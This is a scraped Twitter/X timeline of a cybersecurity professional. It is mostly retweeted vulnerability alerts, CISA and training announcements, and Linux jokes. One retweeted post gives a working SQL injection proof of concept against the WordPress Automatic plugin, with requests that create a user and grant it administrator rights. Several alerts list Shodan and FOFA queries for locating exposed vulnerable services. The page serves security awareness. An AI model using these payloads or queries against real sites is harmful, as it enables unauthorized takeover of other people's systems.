Josmell Chavarri

1.3K posts

@j0sm3ll

Cybersecurity Professional | InfoSec “Read and you will lead; don't read and you will be led”.

Joined January 2012
415 Following 267 Followers
Josmell Chavarri retweeted
Hunter @HunterMapping
🚨Alert🚨CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server 🔥PoC:github.com/absholi7ly/Byp… ⚠It could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data. 📊248K+ Services are found on hunter.how 🔗Hunter Link:hunter.how/list?searchVal… 📰Refer:securityonline.info/cve-2024-4985-… 👇Query Hunter:/product.name="Github Enterprise" FOFA:app="Github-Enterprise" SHODAN:http.html:"Github Enterprise" #GitHub #hunterhow #infosec #infosecurity #Infosys #Vulnerability
absholi7ly @absholi7ly

🔥Poc CVE-2024-4985 #Bypass authentication #GitHub Enterprise Server github.com/absholi7ly/Byp… @HunterMapping @the_yellow_fall @fofabot @Dinosn

English
3
73
193
31.9K
Josmell Chavarri retweeted
Hunter @HunterMapping
🚨Alert🚨CVE-2024-22120 (CVSS 9.1): Zabbix SQLi Vulnerability Exposes IT Infrastructure to Attack 🔥PoC: support.zabbix.com/browse/ZBX-245… 🔥PoC: github.com/W01fh4cker/CVE… ⚠This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE). 📰Refer:securityonline.info/cve-2024-22120… 👇👇👇Hunter is currently under maintenance. You can search on FOFA or SHODAN using the following search syntax. Hunter:/product.name="Zabbix" FOFA:app="ZABBIX-Monitoring" SHODAN:http.component:"Zabbix" #Zabbix #RCE #infosec #infosecurity #Infosys #Vulnerability
English
1
85
271
30.1K
Josmell Chavarri retweeted
Hunter @HunterMapping
🔥PoC for CVE-2024-27956(CVSS 9.9 🔥), Published by @MrTuxracer 📊6K+ Services are found on Hunter.how 🔗Hunter Link:hunter.how/list?searchVal…
Julien | MrTuxracer 🇪🇺@MrTuxracer

Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. Adding a new WordPress user: q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28 Giving the user admin rights: q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c Get pwned: Note: Param "integ" is the md5sum of the query.

English
6
33
93
36.4K
Josmell Chavarri retweeted
Hunter @HunterMapping
🚨Alert🚨CVE-2024-27956(CVSS 9.9 🔥): A WordPress SQL injection vulnerability in the WP-Automatic plugin ⚠More than 5.5 million attacks in just one month! Attackers can gain unauthorized access to websites and potentially take full control of them. 📊6K+ Services are found on Hunter.how 🔗Hunter Link:hunter.how/list?searchVal… 📰Refer: hackhunting.com/2024/04/25/cve… 👇Query Hunter:web.body="wp-content/plugins/wp-automatic" #WordPress #hunterhow #infosec #infosecurity #Infosys #vulnerability
English
3
51
147
25.7K
Josmell Chavarri retweeted
Hunter @HunterMapping
🚨Alert🚨CVE-2024-3400: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect(CVSS: 10) ⚠It enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. 📊 371K+ Services are found on Hunter.how 🔗Hunter Link: hunter.how/list?searchVal… 📰Deep Dive: unit42.paloaltonetworks.com/cve-2024-3400/… 👇Query Hunter: /product.name="GlobalProtect Portal" FOFA: app="paloalto-GlobalProtect" SHODAN: title:"GlobalProtect Portal" #paloalto #GlobalProtect #hunterhow #infosec #infosecurity #Infosys #Vulnerability
English
2
84
277
62.1K
Josmell Chavarri retweeted
CISA Cyber @CISACyber
We’re responding to CVE-2024-3094, a reported supply chain compromise affecting XZ Utils versions 5.6.0 and 5.6.1. XZ Utils may be present in Linux distributions. See our additional guidance at cisa.gov/news-events/al….
English
20
527
1.1K
284.9K
Josmell Chavarri retweeted
Guayoyo @GuayoyoCyber
We were at the #CSIRTAmericasWEEK of @OEA_Cyber delivering training on "Threat detection and active incident response in #Ciberseguridad", with the participation of the #CSIRT members of the #CSIRTAmericas network from Colombia. An excellent opportunity for collaboration!🛡️🇨🇴
Spanish
0
5
7
408
Pyxis @Pyxisportal
The documentary "Detrás del código" brings together inspiring experiences of people who found their path and transformed their lives thanks to technology 💪🏻 Adriana Marchisio, a functional tester on our team, is one of those stories. Watch it here youtu.be/QMbr_HNAbjU?si…
Spanish
3
5
27
2K
Josmell Chavarri retweeted
Guayoyo @GuayoyoCyber
Excited to announce that we will be hosts and sponsors of the @hackthebox_eu Uruguay meetup! 🚀 As a team passionate about cybersecurity, we are delighted to be part of this event that brings together brilliant minds passionate about cybersecurity. 🛡️ 🧵👇🏽
Spanish
1
5
14
578
Josmell Chavarri retweeted
Guayoyo @GuayoyoCyber
As part of the #CSIRTAmericas project of @OEA_Cyber, last Friday in Ecuador 🇪🇨 we delivered the training "Threat Detection and Active Response to Cyberattacks", based on the open-source XDR @wazuh, to members of the national #CSIRTs @CSIRTEcuador and @EcuCERT_EC 🚀👨🏻‍🚀💪
Quito, Ecuador 🇪🇨 Spanish
2
18
30
2.7K
Josmell Chavarri retweeted
Guayoyo @GuayoyoCyber
In 5 minutes @j0sm3ll will be at the ISACA @MvdChapter talking about "Container Security Methodologies" 🚢🔒🛡️
Spanish
0
6
6
0
Josmell Chavarri retweeted
nixCraft 🐧 @nixcraft
Running your software project on a local Linux container on your laptop be like ...
English
24
368
2K
0
Josmell Chavarri retweeted
nixCraft 🐧 @nixcraft
Linux developers and users be like ...
English
38
372
2.3K
0
Josmell Chavarri retweeted
nixCraft 🐧 @nixcraft
OMG. Rare pic of well-written documentation.
English
21
297
1.9K
0
Josmell Chavarri retweeted
nixCraft 🐧 @nixcraft
wtf?
129
205
1.5K
0